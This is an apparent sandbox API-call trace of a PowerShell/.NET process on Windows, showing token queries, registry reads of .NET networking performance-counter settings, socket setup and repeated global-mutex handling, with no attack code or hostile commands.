	[0186.765] GetLastError () returned 0x0
	[0186.765] GetCurrentProcess () returned 0xffffffff
	[0186.766] GetLastError () returned 0x3f0
	[0186.766] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x5fcead0 | out: TokenHandle=0x5fcead0*=0x3c0) returned 1
	[0186.766] GetLastError () returned 0x3f0
	[0186.767] GetCurrentProcess () returned 0xffffffff
	[0186.767] GetLastError () returned 0x3f0
	[0186.767] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x5fcead0 | out: TokenHandle=0x5fcead0*=0x3bc) returned 1
	[0186.767] GetLastError () returned 0x3f0
	[0186.769] GetCurrentProcess () returned 0xffffffff
	[0186.769] GetLastError () returned 0x3f0
	[0186.769] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x5fce840 | out: TokenHandle=0x5fce840*=0x320) returned 1
	[0186.769] GetLastError () returned 0x3f0
	[0186.769] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0x5fce880 | out: lpFileInformation=0x5fce880*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0186.769] GetLastError () returned 0x2
	[0186.769] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x5fce398, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0186.769] GetLastError () returned 0x2
	[0186.770] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0x5fce87c | out: lpFileInformation=0x5fce87c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0186.770] GetLastError () returned 0x2
	[0186.770] GetCurrentProcess () returned 0xffffffff
	[0186.770] GetLastError () returned 0x3f0
	[0186.770] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x5fcead0 | out: TokenHandle=0x5fcead0*=0x38c) returned 1
	[0186.770] GetLastError () returned 0x3f0
	[0186.771] GetCurrentProcess () returned 0xffffffff
	[0186.771] GetLastError () returned 0x3f0
	[0186.771] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x5fcead0 | out: TokenHandle=0x5fcead0*=0x390) returned 1
	[0186.771] GetLastError () returned 0x3f0
	[0186.890] GetCurrentProcess () returned 0xffffffff
	[0186.890] GetLastError () returned 0x3f0
	[0186.890] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x5fce8ac | out: TokenHandle=0x5fce8ac*=0x394) returned 1
	[0186.890] GetLastError () returned 0x3f0
	[0187.008] GetCurrentProcess () returned 0xffffffff
	[0187.008] GetLastError () returned 0x3f0
	[0187.008] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x5fce8bc | out: TokenHandle=0x5fce8bc*=0x398) returned 1
	[0187.008] GetLastError () returned 0x3f0
	[0187.066] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x39c
	[0187.066] GetLastError () returned 0x0
	[0187.066] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3a0
	[0187.066] GetLastError () returned 0x0
	[0187.127] GetCurrentProcess () returned 0xffffffff
	[0187.127] GetLastError () returned 0x3f0
	[0187.127] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x5fce8a0 | out: TokenHandle=0x5fce8a0*=0x3a4) returned 1
	[0187.127] GetLastError () returned 0x3f0
	[0187.132] GetCurrentProcess () returned 0xffffffff
	[0187.132] GetLastError () returned 0x3f0
	[0187.132] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x5fce8b0 | out: TokenHandle=0x5fce8b0*=0x3c4) returned 1
	[0187.132] GetLastError () returned 0x3f0
	[0187.145] GetCurrentProcess () returned 0xffffffff
	[0187.145] GetLastError () returned 0x3f0
	[0187.145] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x5fce874 | out: TokenHandle=0x5fce874*=0x3a8) returned 1
	[0187.145] GetLastError () returned 0x3f0
	[0187.149] GetCurrentProcess () returned 0xffffffff
	[0187.149] GetLastError () returned 0x3f0
	[0187.149] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x5fce884 | out: TokenHandle=0x5fce884*=0x3cc) returned 1
	[0187.149] GetLastError () returned 0x3f0
	[0187.193] GetCurrentProcess () returned 0xffffffff
	[0187.193] GetLastError () returned 0x3f0
	[0187.193] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x5fceb78 | out: TokenHandle=0x5fceb78*=0x3d0) returned 1
	[0187.193] GetLastError () returned 0x3f0
	[0187.244] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion", ulOptions=0x0, samDesired=0x20019, phkResult=0x5fcdbd8 | out: phkResult=0x5fcdbd8*=0x3d4) returned 0x0
	[0187.244] RegQueryValueExW (in: hKey=0x3d4, lpValueName="InstallationType", lpReserved=0x0, lpType=0x5fcdc20, lpData=0x0, lpcbData=0x5fcdc1c*=0x0 | out: lpType=0x5fcdc20*=0x1, lpData=0x0, lpcbData=0x5fcdc1c*=0xe) returned 0x0
	[0187.245] RegQueryValueExW (in: hKey=0x3d4, lpValueName="InstallationType", lpReserved=0x0, lpType=0x5fcdc20, lpData=0x783790, lpcbData=0x5fcdc1c*=0xe | out: lpType=0x5fcdc20*=0x1, lpData="Client", lpcbData=0x5fcdc1c*=0xe) returned 0x0
	[0187.246] RegCloseKey (hKey=0x3d4) returned 0x0
	[0187.302] RasEnumConnectionsW (in: param_1=0x786f38, param_2=0x5fcebf0, param_3=0x5fcebf4 | out: param_1=0x786f38, param_2=0x5fcebf0, param_3=0x5fcebf4) returned 0x0
	[0187.773] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x783790 | out: lpWSAData=0x783790) returned 0
	[0187.798] GetLastError () returned 0x0
	[0187.805] WSASocketW (af=2, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x0) returned 0x420
	[0188.251] GetLastError () returned 0x0
	[0188.251] setsockopt (s=0x420, level=65535, optname=128, optval="\x01", optlen=4) returned -1
	[0188.251] GetLastError () returned 0x273a
	[0188.251] closesocket (s=0x420) returned 0
	[0188.251] GetLastError () returned 0x0
	[0188.251] WSASocketW (af=23, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x0) returned 0x420
	[0188.255] GetLastError () returned 0x0
	[0188.255] setsockopt (s=0x420, level=65535, optname=128, optval="\x01", optlen=4) returned -1
	[0188.255] GetLastError () returned 0x273a
	[0188.256] closesocket (s=0x420) returned 0
	[0188.256] GetLastError () returned 0x0
	[0188.260] GetCurrentProcess () returned 0xffffffff
	[0188.260] GetLastError () returned 0x3f0
	[0188.260] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x5fce75c | out: TokenHandle=0x5fce75c*=0x420) returned 1
	[0188.261] GetLastError () returned 0x3f0
	[0188.268] GetCurrentProcess () returned 0xffffffff
	[0188.268] GetLastError () returned 0x3f0
	[0188.268] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x5fce76c | out: TokenHandle=0x5fce76c*=0x424) returned 1
	[0188.268] GetLastError () returned 0x3f0
	[0188.292] GetCurrentProcessId () returned 0x888
	[0188.341] GetComputerNameW (in: lpBuffer=0x786f38, nSize=0x2c5389c | out: lpBuffer="XDUWTFONO", nSize=0x2c5389c) returned 1
	[0188.343] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\.NET CLR Networking\\Performance", ulOptions=0x0, samDesired=0x20019, phkResult=0x5fce9c0 | out: phkResult=0x5fce9c0*=0x428) returned 0x0
	[0188.343] RegQueryValueExW (in: hKey=0x428, lpValueName="Library", lpReserved=0x0, lpType=0x5fcea08, lpData=0x0, lpcbData=0x5fcea04*=0x0 | out: lpType=0x5fcea08*=0x1, lpData=0x0, lpcbData=0x5fcea04*=0x1c) returned 0x0
	[0188.343] RegQueryValueExW (in: hKey=0x428, lpValueName="Library", lpReserved=0x0, lpType=0x5fcea08, lpData=0x783790, lpcbData=0x5fcea04*=0x1c | out: lpType=0x5fcea08*=0x1, lpData="netfxperf.dll", lpcbData=0x5fcea04*=0x1c) returned 0x0
	[0188.343] RegQueryValueExW (in: hKey=0x428, lpValueName="IsMultiInstance", lpReserved=0x0, lpType=0x5fcea08, lpData=0x0, lpcbData=0x5fcea04*=0x0 | out: lpType=0x5fcea08*=0x4, lpData=0x0, lpcbData=0x5fcea04*=0x4) returned 0x0
	[0188.345] RegQueryValueExW (in: hKey=0x428, lpValueName="IsMultiInstance", lpReserved=0x0, lpType=0x5fcea08, lpData=0x5fce9f4, lpcbData=0x5fcea04*=0x4 | out: lpType=0x5fcea08*=0x4, lpData=0x5fce9f4*=0x1, lpcbData=0x5fcea04*=0x4) returned 0x0
	[0188.345] RegQueryValueExW (in: hKey=0x428, lpValueName="First Counter", lpReserved=0x0, lpType=0x5fcea08, lpData=0x0, lpcbData=0x5fcea04*=0x0 | out: lpType=0x5fcea08*=0x4, lpData=0x0, lpcbData=0x5fcea04*=0x4) returned 0x0
	[0188.345] RegQueryValueExW (in: hKey=0x428, lpValueName="First Counter", lpReserved=0x0, lpType=0x5fcea08, lpData=0x5fce9f4, lpcbData=0x5fcea04*=0x4 | out: lpType=0x5fcea08*=0x4, lpData=0x5fce9f4*=0x137a, lpcbData=0x5fcea04*=0x4) returned 0x0
	[0188.345] RegCloseKey (hKey=0x428) returned 0x0
	[0188.347] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\.net clr networking\\Performance", ulOptions=0x0, samDesired=0x20019, phkResult=0x5fce9bc | out: phkResult=0x5fce9bc*=0x428) returned 0x0
	[0188.347] RegQueryValueExW (in: hKey=0x428, lpValueName="CategoryOptions", lpReserved=0x0, lpType=0x5fcea04, lpData=0x0, lpcbData=0x5fcea00*=0x0 | out: lpType=0x5fcea04*=0x4, lpData=0x0, lpcbData=0x5fcea00*=0x4) returned 0x0
	[0188.347] RegQueryValueExW (in: hKey=0x428, lpValueName="CategoryOptions", lpReserved=0x0, lpType=0x5fcea04, lpData=0x5fce9f0, lpcbData=0x5fcea00*=0x4 | out: lpType=0x5fcea04*=0x4, lpData=0x5fce9f0*=0x3, lpcbData=0x5fcea00*=0x4) returned 0x0
	[0188.347] RegQueryValueExW (in: hKey=0x428, lpValueName="FileMappingSize", lpReserved=0x0, lpType=0x5fcea04, lpData=0x0, lpcbData=0x5fcea00*=0x0 | out: lpType=0x5fcea04*=0x4, lpData=0x0, lpcbData=0x5fcea00*=0x4) returned 0x0
	[0188.347] RegQueryValueExW (in: hKey=0x428, lpValueName="FileMappingSize", lpReserved=0x0, lpType=0x5fcea04, lpData=0x5fce9f0, lpcbData=0x5fcea00*=0x4 | out: lpType=0x5fcea04*=0x4, lpData=0x5fce9f0*=0x20000, lpcbData=0x5fcea00*=0x4) returned 0x0
	[0188.348] RegQueryValueExW (in: hKey=0x428, lpValueName="Counter Names", lpReserved=0x0, lpType=0x5fcea04, lpData=0x0, lpcbData=0x5fcea00*=0x0 | out: lpType=0x5fcea04*=0x3, lpData=0x0, lpcbData=0x5fcea00*=0xaa) returned 0x0
	[0188.348] RegQueryValueExW (in: hKey=0x428, lpValueName="Counter Names", lpReserved=0x0, lpType=0x5fcea04, lpData=0x2c55fe0, lpcbData=0x5fcea00*=0xaa | out: lpType=0x5fcea04*=0x3, lpData=0x2c55fe0*, lpcbData=0x5fcea00*=0xaa) returned 0x0
	[0188.351] ConvertStringSecurityDescriptorToSecurityDescriptorW () returned 0x1
	[0188.353] GetLastError () returned 0x0
	[0188.356] CreateFileMappingW (hFile=0xffffffff, lpFileMappingAttributes=0x7837c0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x20000, lpName="Global\\netfxcustomperfcounters.1.0.net clr networking") returned 0x0
	[0188.356] GetLastError () returned 0x5
	[0188.359] OpenFileMappingW (dwDesiredAccess=0x2, bInheritHandle=0, lpName="Global\\netfxcustomperfcounters.1.0.net clr networking") returned 0x430
	[0188.359] GetLastError () returned 0x5
	[0188.361] VirtualQuery (in: lpAddress=0x52f0000, lpBuffer=0x5fce9d4, dwLength=0x1c | out: lpBuffer=0x5fce9d4*(BaseAddress=0x52f0000, AllocationBase=0x52f0000, AllocationProtect=0x4, RegionSize=0x20000, State=0x1000, Protect=0x4, Type=0x40000)) returned 0x1c
	[0188.361] GetLastError () returned 0x5
	[0188.361] LocalFree (hMem=0x76cba8) returned 0x0
	[0188.361] RegCloseKey (hKey=0x428) returned 0x0
	[0188.362] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2c56a5c, cbSid=0x5fce9b4 | out: pSid=0x2c56a5c*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x5fce9b4) returned 1
	[0188.362] GetLastError () returned 0x5
	[0188.365] CreateMutexW (lpMutexAttributes=0x2c56b94, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x428
	[0188.365] GetLastError () returned 0x0
	[0188.367] WaitForSingleObject (hHandle=0x428, dwMilliseconds=0x1f4) returned 0x0
	[0188.367] GetLastError () returned 0x0
	[0188.367] GetCurrentProcessId () returned 0x888
	[0188.368] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x888) returned 0x434
	[0188.368] GetLastError () returned 0x0
	[0188.371] GetProcessTimes (in: hProcess=0x434, lpCreationTime=0x5fce91c, lpExitTime=0x5fce914, lpKernelTime=0x5fce914, lpUserTime=0x5fce914 | out: lpCreationTime=0x5fce91c, lpExitTime=0x5fce914, lpKernelTime=0x5fce914, lpUserTime=0x5fce914) returned 1
	[0188.371] GetLastError () returned 0x0
	[0188.373] CloseHandle (hObject=0x434) returned 1
	[0188.373] GetLastError () returned 0x0
	[0188.373] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x708) returned 0x434
	[0188.373] GetLastError () returned 0x0
	[0188.373] GetProcessTimes (in: hProcess=0x434, lpCreationTime=0x5fce96c, lpExitTime=0x5fce964, lpKernelTime=0x5fce964, lpUserTime=0x5fce964 | out: lpCreationTime=0x5fce96c, lpExitTime=0x5fce964, lpKernelTime=0x5fce964, lpUserTime=0x5fce964) returned 1
	[0188.373] GetLastError () returned 0x0
	[0188.375] CloseHandle (hObject=0x434) returned 1
	[0188.375] GetLastError () returned 0x0
	[0188.375] OpenProcess (dwDesiredAccess=0x100000, bInheritHandle=0, dwProcessId=0x708) returned 0x434
	[0188.375] GetLastError () returned 0x0
	[0188.375] GetCurrentProcess () returned 0xffffffff
	[0188.375] GetLastError () returned 0x0
	[0188.375] GetCurrentProcess () returned 0xffffffff
	[0188.375] GetLastError () returned 0x0
	[0188.378] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x434, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5fce8cc, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5fce8cc*=0x438) returned 1
	[0188.378] GetLastError () returned 0x0
	[0188.380] CloseHandle (hObject=0x438) returned 1
	[0188.380] GetLastError () returned 0x0
	[0188.382] CloseHandle (hObject=0x434) returned 1
	[0188.382] GetLastError () returned 0x0
	[0188.382] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x120) returned 0x434
	[0188.382] GetLastError () returned 0x0
	[0188.382] GetProcessTimes (in: hProcess=0x434, lpCreationTime=0x5fce96c, lpExitTime=0x5fce964, lpKernelTime=0x5fce964, lpUserTime=0x5fce964 | out: lpCreationTime=0x5fce96c, lpExitTime=0x5fce964, lpKernelTime=0x5fce964, lpUserTime=0x5fce964) returned 1
	[0188.382] GetLastError () returned 0x0
	[0188.382] CloseHandle (hObject=0x434) returned 1
	[0188.382] GetLastError () returned 0x0
	[0188.382] OpenProcess (dwDesiredAccess=0x100000, bInheritHandle=0, dwProcessId=0x120) returned 0x434
	[0188.382] GetLastError () returned 0x0
	[0188.382] GetCurrentProcess () returned 0xffffffff
	[0188.382] GetLastError () returned 0x0
	[0188.382] GetCurrentProcess () returned 0xffffffff
	[0188.382] GetLastError () returned 0x0
	[0188.382] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x434, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5fce8cc, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5fce8cc*=0x438) returned 1
	[0188.383] GetLastError () returned 0x0
	[0188.383] CloseHandle (hObject=0x438) returned 1
	[0188.383] GetLastError () returned 0x0
	[0188.383] CloseHandle (hObject=0x434) returned 1
	[0188.383] GetLastError () returned 0x0
	[0188.383] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xaa0) returned 0x434
	[0188.383] GetLastError () returned 0x0
	[0188.383] GetProcessTimes (in: hProcess=0x434, lpCreationTime=0x5fce96c, lpExitTime=0x5fce964, lpKernelTime=0x5fce964, lpUserTime=0x5fce964 | out: lpCreationTime=0x5fce96c, lpExitTime=0x5fce964, lpKernelTime=0x5fce964, lpUserTime=0x5fce964) returned 1
	[0188.383] GetLastError () returned 0x0
	[0188.383] CloseHandle (hObject=0x434) returned 1
	[0188.384] GetLastError () returned 0x0
	[0188.384] OpenProcess (dwDesiredAccess=0x100000, bInheritHandle=0, dwProcessId=0xaa0) returned 0x434
	[0188.384] GetLastError () returned 0x0
	[0188.384] GetCurrentProcess () returned 0xffffffff
	[0188.384] GetLastError () returned 0x0
	[0188.384] GetCurrentProcess () returned 0xffffffff
	[0188.384] GetLastError () returned 0x0
	[0188.384] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x434, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5fce8cc, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5fce8cc*=0x438) returned 1
	[0188.384] GetLastError () returned 0x0
	[0188.384] CloseHandle (hObject=0x438) returned 1
	[0188.384] GetLastError () returned 0x0
	[0188.384] CloseHandle (hObject=0x434) returned 1
	[0188.385] GetLastError () returned 0x0
	[0188.385] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x808) returned 0x434
	[0188.385] GetLastError () returned 0x0
	[0188.385] GetProcessTimes (in: hProcess=0x434, lpCreationTime=0x5fce96c, lpExitTime=0x5fce964, lpKernelTime=0x5fce964, lpUserTime=0x5fce964 | out: lpCreationTime=0x5fce96c, lpExitTime=0x5fce964, lpKernelTime=0x5fce964, lpUserTime=0x5fce964) returned 1
	[0188.385] GetLastError () returned 0x0
	[0188.385] CloseHandle (hObject=0x434) returned 1
	[0188.385] GetLastError () returned 0x0
	[0188.385] OpenProcess (dwDesiredAccess=0x100000, bInheritHandle=0, dwProcessId=0x808) returned 0x434
	[0188.385] GetLastError () returned 0x0
	[0188.385] GetCurrentProcess () returned 0xffffffff
	[0188.385] GetLastError () returned 0x0
	[0188.385] GetCurrentProcess () returned 0xffffffff
	[0188.385] GetLastError () returned 0x0
	[0188.386] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x434, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5fce8cc, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5fce8cc*=0x438) returned 1
	[0188.386] GetLastError () returned 0x0
	[0188.386] CloseHandle (hObject=0x438) returned 1
	[0188.386] GetLastError () returned 0x0
	[0188.464] GetProcessTimes (in: hProcess=0x434, lpCreationTime=0x5fce96c, lpExitTime=0x5fce964, lpKernelTime=0x5fce964, lpUserTime=0x5fce964 | out: lpCreationTime=0x5fce96c, lpExitTime=0x5fce964, lpKernelTime=0x5fce964, lpUserTime=0x5fce964) returned 1
	[0188.464] GetLastError () returned 0x0
	[0188.464] GetProcessTimes (in: hProcess=0x434, lpCreationTime=0x5fce96c, lpExitTime=0x5fce964, lpKernelTime=0x5fce964, lpUserTime=0x5fce964 | out: lpCreationTime=0x5fce96c, lpExitTime=0x5fce964, lpKernelTime=0x5fce964, lpUserTime=0x5fce964) returned 1
	[0188.464] GetLastError () returned 0x0
	[0188.480] GetLastError () returned 0x0
	[0188.480] CloseHandle (hObject=0x428) returned 1
	[0188.481] GetLastError () returned 0x0
	[0188.481] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2c57600, cbSid=0x5fce9b4 | out: pSid=0x2c57600*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x5fce9b4) returned 1
	[0188.481] GetLastError () returned 0x0
	[0188.481] CreateMutexW (lpMutexAttributes=0x2c57710, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x0
	[0188.481] GetLastError () returned 0x5
	[0188.484] OpenMutexW (dwDesiredAccess=0x100001, bInheritHandle=0, lpName="Global\\.net clr networking") returned 0x428
	[0188.484] GetLastError () returned 0x5
	[0188.484] WaitForSingleObject (hHandle=0x428, dwMilliseconds=0x1f4) returned 0x0
	[0188.530] GetLastError () returned 0x5
	[0188.531] ReleaseMutex (hMutex=0x428) returned 1
	[0188.531] GetLastError () returned 0x5
	[0188.531] CloseHandle (hObject=0x428) returned 1
	[0188.531] GetLastError () returned 0x5
	[0188.531] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2c57e9c, cbSid=0x5fce9b4 | out: pSid=0x2c57e9c*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x5fce9b4) returned 1
	[0188.531] GetLastError () returned 0x5
	[0188.532] CreateMutexW (lpMutexAttributes=0x2c57fac, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x0
	[0188.532] GetLastError () returned 0x5
	[0188.532] OpenMutexW (dwDesiredAccess=0x100001, bInheritHandle=0, lpName="Global\\.net clr networking") returned 0x428
	[0188.532] GetLastError () returned 0x5
	[0188.532] WaitForSingleObject (hHandle=0x428, dwMilliseconds=0x1f4) returned 0x0
	[0188.561] GetLastError () returned 0x5
	[0188.562] ReleaseMutex (hMutex=0x428) returned 1
	[0188.562] GetLastError () returned 0x5
	[0188.562] CloseHandle (hObject=0x428) returned 1
	[0188.562] GetLastError () returned 0x5
	[0188.562] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2c58748, cbSid=0x5fce9b4 | out: pSid=0x2c58748*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x5fce9b4) returned 1
	[0188.562] GetLastError () returned 0x5
	[0188.563] CreateMutexW (lpMutexAttributes=0x2c58858, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x0
	[0188.563] GetLastError () returned 0x5
	[0188.563] OpenMutexW (dwDesiredAccess=0x100001, bInheritHandle=0, lpName="Global\\.net clr networking") returned 0x428
	[0188.563] GetLastError () returned 0x5
	[0188.563] WaitForSingleObject (hHandle=0x428, dwMilliseconds=0x1f4) returned 0x0
	[0188.565] GetLastError () returned 0x5
	[0188.565] ReleaseMutex (hMutex=0x428) returned 1
	[0188.566] GetLastError () returned 0x5
	[0188.566] CloseHandle (hObject=0x428) returned 1
	[0188.566] GetLastError () returned 0x5
	[0188.566] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2c58fec, cbSid=0x5fce9b4 | out: pSid=0x2c58fec*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x5fce9b4) returned 1
	[0188.566] GetLastError () returned 0x5
	[0188.566] CreateMutexW (lpMutexAttributes=0x2c590fc, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x0
	[0188.567] GetLastError () returned 0x5
	[0188.567] OpenMutexW (dwDesiredAccess=0x100001, bInheritHandle=0, lpName="Global\\.net clr networking") returned 0x428
	[0188.567] GetLastError () returned 0x5
	[0188.567] WaitForSingleObject (hHandle=0x428, dwMilliseconds=0x1f4) returned 0x0
	[0188.569] GetLastError () returned 0x5
	[0188.569] ReleaseMutex (hMutex=0x428) returned 1
	[0188.569] GetLastError () returned 0x5
	[0188.570] CloseHandle (hObject=0x428) returned 1
	[0188.570] GetLastError () returned 0x5
	[0188.570] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2c5988c, cbSid=0x5fce9ac | out: pSid=0x2c5988c*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x5fce9ac) returned 1
	[0188.570] GetLastError () returned 0x5
	[0188.571] CreateMutexW (lpMutexAttributes=0x2c5999c, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x0
	[0188.571] GetLastError () returned 0x5
	[0188.571] OpenMutexW (dwDesiredAccess=0x100001, bInheritHandle=0, lpName="Global\\.net clr networking") returned 0x428
	[0188.571] GetLastError () returned 0x5
	[0188.571] WaitForSingleObject (hHandle=0x428, dwMilliseconds=0x1f4) returned 0x0
	[0188.574] GetLastError () returned 0x5
	[0188.574] ReleaseMutex (hMutex=0x428) returned 1
	[0188.574] GetLastError () returned 0x5
	[0188.574] CloseHandle (hObject=0x428) returned 1
	[0188.575] GetLastError () returned 0x5
	[0188.575] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2c5a11c, cbSid=0x5fce9ac | out: pSid=0x2c5a11c*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x5fce9ac) returned 1
	[0188.575] GetLastError () returned 0x5
	[0188.575] CreateMutexW (lpMutexAttributes=0x2c5a22c, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x0
	[0188.576] GetLastError () returned 0x5
	[0188.576] OpenMutexW (dwDesiredAccess=0x100001, bInheritHandle=0, lpName="Global\\.net clr networking") returned 0x428
	[0188.576] GetLastError () returned 0x5
	[0188.576] WaitForSingleObject (hHandle=0x428, dwMilliseconds=0x1f4) returned 0x0
	[0188.579] GetLastError () returned 0x5
	[0188.579] ReleaseMutex (hMutex=0x428) returned 1
	[0188.579] GetLastError () returned 0x5
	[0188.579] CloseHandle (hObject=0x428) returned 1
	[0188.579] GetLastError () returned 0x5
	[0188.579] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2c5a9a4, cbSid=0x5fce9ac | out: pSid=0x2c5a9a4*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x5fce9ac) returned 1
	[0188.579] GetLastError () returned 0x5
	[0188.580] CreateMutexW (lpMutexAttributes=0x2c5aab4, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x0
	[0188.580] GetLastError () returned 0x5
	[0188.580] OpenMutexW (dwDesiredAccess=0x100001, bInheritHandle=0, lpName="Global\\.net clr networking") returned 0x428
	[0188.580] GetLastError () returned 0x5
	[0188.580] WaitForSingleObject (hHandle=0x428, dwMilliseconds=0x1f4) returned 0x0
	[0188.582] GetLastError () returned 0x5
	[0188.582] ReleaseMutex (hMutex=0x428) returned 1
	[0188.582] GetLastError () returned 0x5
	[0188.583] CloseHandle (hObject=0x428) returned 1
	[0188.583] GetLastError () returned 0x5
